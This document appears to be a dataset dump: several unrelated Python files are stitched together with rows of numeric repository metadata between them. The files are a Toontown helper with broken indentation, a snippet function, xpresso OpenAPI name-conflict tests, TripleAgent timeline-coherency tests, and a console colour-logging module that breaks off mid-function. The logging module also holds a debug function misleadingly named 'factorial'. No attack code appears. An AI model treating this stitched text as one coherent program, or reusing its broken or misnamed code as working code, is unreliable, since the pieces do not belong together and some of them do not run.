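# builtins at runtime (assumed from the Toontown/Panda3D context), so no import
# of `base` is needed in this module.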
def getFriendColor(handle):
return CCNormal if base.localAvatar.isTrueFriends(handle.doId) else CCSpeedChat
| 39.146341
| 83
| 0.335826
| 1,600
| 8,025
| 1.681875
| 0.03875
| 0.200669
| 0.217391
| 0.221479
| 0.736901
| 0.735414
| 0.726496
| 0.726496
| 0.723523
| 0.723523
| 0
| 0.288062
| 0.423801
| 8,025
| 205
| 83
| 39.146341
| 0.293901
| 0.248598
| 0
| 0.554795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0
| 0.006849
| 0.013699
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
3847175c1831e351c1e176a360a63bb3b77691ab
| 101
|
py
|
Python
|
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | 1
|
2015-06-25T22:09:49.000Z
|
2015-06-25T22:09:49.000Z
|
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | null | null | null |
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | null | null | null |
def text_snippet_start(s, max_len=10):
return s[:max_len] + ('...' if len(s) > max_len else '')
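# Illustrative example: text_snippet_start("hello world", max_len=5) returns
# 'hello...', while text_snippet_start("hi") returns 'hi' unchanged.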
| 25.25
| 60
| 0.613861
| 18
| 101
| 3.166667
| 0.611111
| 0.210526
| 0.368421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.178218
| 101
| 3
| 61
| 33.666667
| 0.662651
| 0
| 0
| 0
| 0
| 0
| 0.03
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
69af9cbe1a0924e12f9699b8936cf401ce8aba2e
| 13,111
|
py
|
Python
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 75
|
2022-01-18T02:17:57.000Z
|
2022-03-24T02:30:04.000Z
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 73
|
2022-01-18T03:01:27.000Z
|
2022-03-27T16:41:38.000Z
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 3
|
2022-01-18T22:47:06.000Z
|
2022-01-25T02:03:53.000Z
|
from dataclasses import dataclass
from typing import Any, Dict
from tests.test_openapi.model_name_conflict_resolution.user1 import User as User1
from tests.test_openapi.model_name_conflict_resolution.user2 import User as User2
from xpresso import (
App,
FromFormField,
FromHeader,
FromJson,
FromMultipart,
FromQuery,
Path,
)
from xpresso.testclient import TestClient
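# Each test below registers two distinct `User` models (user1.User and user2.User)
# on one endpoint and asserts that xpresso disambiguates the colliding schema
# names in the generated OpenAPI document by prefixing the full module path
# (tests__test_openapi__model_name_conflict_resolution__user1__User vs __user2__User).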
def test_duplicate_model_name_in_parameters() -> None:
async def endpoint(q1: FromQuery[User1], q2: FromHeader[User2]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"name": "q1",
"in": "query",
},
{
"required": True,
"style": "simple",
"explode": False,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
},
"name": "q2",
"in": "header",
},
],
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
def test_duplicate_model_name_in_form_data() -> None:
@dataclass
class FormData:
field1: FromFormField[User1]
field2: FromFormField[User2]
async def endpoint(form: FromMultipart[FormData]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"requestBody": {
"content": {
"multipart/form-data": {
"schema": {
"required": ["field1", "field2"],
"type": "object",
"properties": {
"field1": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"field2": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
},
},
},
"encoding": {
"field1": {"style": "form", "explode": True},
"field2": {"style": "form", "explode": True},
},
}
},
"required": True,
},
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
def test_model_shared_between_params_and_body() -> None:
async def endpoint(q: FromQuery[User1], b: FromJson[User2]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"name": "q",
"in": "query",
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
}
}
},
"required": True,
},
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
| 38.905045
| 139
| 0.331477
| 721
| 13,111
| 5.772538
| 0.147018
| 0.034599
| 0.05382
| 0.070639
| 0.834935
| 0.834935
| 0.823642
| 0.818357
| 0.793369
| 0.793369
| 0
| 0.013103
| 0.540157
| 13,111
| 336
| 140
| 39.020833
| 0.677227
| 0
| 0
| 0.617089
| 0
| 0
| 0.249638
| 0.085577
| 0
| 0
| 0
| 0
| 0.018987
| 1
| 0.009494
| false
| 0
| 0.018987
| 0
| 0.037975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69df7c42a566b7483ba22ada5ccb396dd4fcf747
| 77
|
py
|
Python
|
src/stk/serialization/json/deserializers/__init__.py
|
andrewtarzia/stk
|
1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/serialization/json/deserializers/__init__.py
|
JelfsMaterialsGroup/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/serialization/json/deserializers/__init__.py
|
supramolecular-toolkit/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
from .molecule import * # noqa
from .constructed_molecule import * # noqa
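# Both wildcard imports re-export the submodules' public names at the package
# level; the `# noqa` markers suppress flake8's star-import warnings (F401/F403).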
| 25.666667
| 44
| 0.727273
| 9
| 77
| 6.111111
| 0.555556
| 0.509091
| 0.654545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194805
| 77
| 2
| 45
| 38.5
| 0.887097
| 0.116883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2a5535da3c1a5f74644e14fc299e9e3dffcd7fef
| 8,054
|
py
|
Python
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 3
|
2020-04-25T11:42:03.000Z
|
2020-07-08T16:38:26.000Z
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 17
|
2019-08-11T19:09:55.000Z
|
2021-03-30T17:12:28.000Z
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | null | null | null |
import pytest
from triple_agent.classes.missions import Missions
from triple_agent.classes.books import Books
from triple_agent.classes.timeline import TimelineCoherency, Timeline
SPY_CAST_INDEX = 0
AMBA_CAST_INDEX = 1
CIVILIAN_CAST_INDEX = 9
SWAP_SELECTED_INDEX = 18
INSPECT_ENABLED_INDEX = 27
GAME_START_INDEX = 31
FINGERPRINT_COMPLETE_INDEX = 77
GAME_END_INDEX = 101
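# These indices locate specific events in the reference game's timeline; the
# tests below delete or mutate the entry at an index to provoke exactly one
# (or one combination) of the TimelineCoherency flags.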
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_correct(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
# check that the game is coherent to begin with.
assert game.is_timeline_coherent() == TimelineCoherency.Coherent
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_timeline(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = None
assert game.is_timeline_coherent() == TimelineCoherency.NoTimeline
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_role(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[6].role = (None,)
assert game.is_timeline_coherent() == TimelineCoherency.CharacterNotAssignedRole
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_cast_name(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[6].cast_name = (None,)
assert game.is_timeline_coherent() == TimelineCoherency.RoleWithNoCharacter
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_start(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != GAME_START_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.NoGameStart
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_end(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != GAME_END_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.NoGameEnding
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_start_or_end(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t
for i, t in enumerate(game.timeline)
if i not in [GAME_START_INDEX, GAME_END_INDEX]
]
assert (
game.is_timeline_coherent()
== TimelineCoherency.NoGameStart | TimelineCoherency.NoGameEnding
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count_and_spy(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != SPY_CAST_INDEX]
assert (
game.is_timeline_coherent()
== TimelineCoherency.SpyNotCastInBeginning
| TimelineCoherency.GuestCountMismatch
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != CIVILIAN_CAST_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.GuestCountMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_start_clock(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[0].time = 200
assert (
game.is_timeline_coherent()
== TimelineCoherency.StartClockMismatch | TimelineCoherency.TimeRewind
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_start_clock_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.start_clock_seconds = 200
assert game.is_timeline_coherent() == TimelineCoherency.StartClockMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count_amba(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != AMBA_CAST_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.GuestCountMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_missing_book(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[48].books = (None, Books.Green)
assert game.is_timeline_coherent() == TimelineCoherency.BookMissingColor
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_rewind(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = Timeline(game.timeline.lines + game.timeline.lines[-10:])
assert game.is_timeline_coherent() == TimelineCoherency.TimeRewind
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_complete_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.completed_missions = game.completed_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.CompletedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_selected_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.selected_missions = game.selected_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.SelectedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_picked_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.picked_missions = game.picked_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.PickedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_complete_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t for i, t in enumerate(game.timeline) if i != FINGERPRINT_COMPLETE_INDEX
]
assert game.is_timeline_coherent() == TimelineCoherency.CompletedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_selected_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != SWAP_SELECTED_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.SelectedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_picked_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t for i, t in enumerate(game.timeline) if i != INSPECT_ENABLED_INDEX
]
assert game.is_timeline_coherent() == TimelineCoherency.PickedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_elapsed(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[10].elapsed_time = None
assert game.is_timeline_coherent() == TimelineCoherency.ElapsedTimeMissing
| 33.280992
| 88
| 0.785572
| 986
| 8,054
| 6.100406
| 0.099391
| 0.069825
| 0.139651
| 0.174564
| 0.868495
| 0.868495
| 0.848878
| 0.813799
| 0.770906
| 0.741978
| 0
| 0.031714
| 0.130867
| 8,054
| 241
| 89
| 33.419087
| 0.827571
| 0.005711
| 0
| 0.573864
| 0
| 0
| 0.057707
| 0.057707
| 0
| 0
| 0
| 0
| 0.238636
| 1
| 0.119318
| false
| 0
| 0.022727
| 0
| 0.142045
| 0.017045
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a587ceea7996e96a61097f62af34c8de073e873
| 38,987
|
py
|
Python
|
_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | 1
|
2021-06-02T00:36:03.000Z
|
2021-06-02T00:36:03.000Z
|
_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
import os
import sys
import datetime
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
import _appEnvironment as thisApp
from _appEnvironment import FILELOG_ON,CONSOLE_ON,DEBUG_ON,log_file_name,log_errors_file_name
from _colorServices import colorized_text, apply_colors, colorized_string, Fore, Back, Style, default_colors_template, colors_template_result, colors_template_changes, xcolors, fix_colors, clean_colors
from _moduleConfigServices import retrieve_module_configuration
import textwrap
import pprint
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#globals
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
global_max_print_line_width = 100
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# print services
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
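# Note: despite its name, `factorial` below is not a factorial; it is a scratch
# (debug-print) variant of decorated_data_recursion_nocolors that recursively
# renders nested lists/dicts into a single string.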
def factorial(n,d,s):
print("n=",n,'d=',d,'s=',s)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if type(d) == type(''):
ds = f"'{d}'"
else:
ds=str(d)
return(0,'',ds)
else:
if type(d) == type([]):
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
print('wwwwww', w,'n=',n,'l=',len(d))
if type(w) == type({}):
x = 1
(nn, nd, ns) = factorial(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return factorial(n + 1, d, s)
else:
return (0,'',s) # list exhausted: return the accumulated string
elif type(d) == type({}):
if n < len(d):
if n == 0:
s = s + '{'
keys = list(d.keys())
k = keys[n]
w = d.get(k)
s = s + f"'{k}':"
(nn, nd, ns) = factorial(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + '}'
else:
s = s + ', '
return factorial(n + 1, d, s)
else:
return (0, '', s)
else:
return(0,'',s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#print(factorial(0, ['aaaa', ['1111', 3.345, '3333', ['1', '2', '3']], 'cccc', {'xxxx':1111, 'zzzzz':3333}], ''))
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data_recursion_nocolors(n,d,s):
# print("n=",n,'d=',d,'s=',s)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if type(d) == type(''):
ds = f"'{d}'"
else:
ds=str(d)
return(0,'',ds)
else:
if type(d) == type([]):
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
# print('next item:', w,'n=',n,'l=',len(d))
(nn, nd, ns) = decorated_data_recursion_nocolors(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return decorated_data_recursion_nocolors(n + 1, d, s)
else:
return (0,'',s)
elif type(d) == type({}):
if n < len(d):
if n == 0:
s = s + '{'
keys = list(d.keys())
k = keys[n]
w = d.get(k)
s = s + f"'{k}':"
(nn, nd, ns) = decorated_data_recursion_nocolors(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + '}'
else:
s = s + ', '
return decorated_data_recursion_nocolors(n + 1, d, s)
else:
return (0, '', s)
else:
return(0,'',s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_colors_template(template):
if not template:
return default_colors_template
if template:
if type(template) == type({}):
colors_template = template
elif type(template) == type(''):
if template.strip().upper() == 'RESULT':
colors_template = colors_template_result
elif template.strip().upper() == 'CHANGES':
colors_template = colors_template_changes
elif template.strip().upper() == 'MONOCHROME':
colors_template = colors_template_changes
else:
colors_template = default_colors_template # unknown template name: fall back to the default
elif type(template) == type([]):
colors_template = default_colors_template # list templates are not supported: fall back to the default
else:
colors_template = default_colors_template # unsupported template type: fall back to the default
return colors_template
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_template_compo(compo,what='',default='',colors_template={}):
if what:
color = colors_template.get(compo, {}).get(what)
if color:
return color
color = colors_template.get(compo)
if type(color)==type({}):
if compo.lower().find('key')>=0:
color = colors_template.get(compo, {}).get('key_color')
if not color:
color = colors_template.get(compo, {}).get('data_color')
elif compo.lower().find('data')>=0:
color = colors_template.get(compo, {}).get('data_color')
if not color:
color = colors_template.get(compo, {}).get('key_color')
if not color:
color=default
return color
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_template_dict_compos(colors_template,level=0):
c0=None
for k in ('[', ']', '{', '}'):
c0 = get_template_compo(k, '', '', colors_template)
if c0:
break
if not c0:
c0 = '#YELLOW#'
k='level_'+str(level)+'_dict_key'
c1 = get_template_compo(k, '', '', colors_template)
if not c1:
c1 = get_template_compo('dict_key', '', '#BLUE#', colors_template)
k='level_'+str(level)+'_dict_data'
c2 = get_template_compo(k, '', '', colors_template)
if not c2:
c2 = get_template_compo('dict_key', '', '#WHITE#', colors_template)
# if 1==2:
# k='level_'+str(level)+'_dict_keys'
# c1 = get_template_compo(k, '', '', colors_template)
# if not c1:
# c1 = get_template_compo('dict_keys', '', '#BLUE#', colors_template)
# k='level_'+str(level)+'_dict_data'
# c2 = get_template_compo(k, '', '', colors_template)
# if not c2:
# c2=get_template_compo('dict_data','','#WHITE#',colors_template)
return (c0, c1, c2)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data_recursion(n,d,s,colors_template={},level=0):
# print("n=",n,'d=',d,'s=',s)
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if d is None:
ds = str(d)
else:
ds=d
return(0,'',ds)
else:
if type(d) == type([]):
k = 'array_item_' + str(n + 1)
ck=get_template_compo(k,'key_color',c1,colors_template)
cd=get_template_compo(k,'data_color',c2,colors_template)
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
# print('next item:', w,'n=',n,'l=',len(d))
(nn, nd, ns) = decorated_data_recursion(0, w, '', colors_template, level)
if type(ns) == type(''):
ds = f"#C0#'{cd}{ns}#C0#'"
else:
ds=f"{cd}{d}#C0#"
s = s + ds
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return decorated_data_recursion(n + 1, d, s, colors_template, level)
else:
return (0,'',s)
elif type(d) == type({}):
if n < len(d):
if n == 0:
level = level + 1
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
s = s + c0+'{'
keys = list(d.keys())
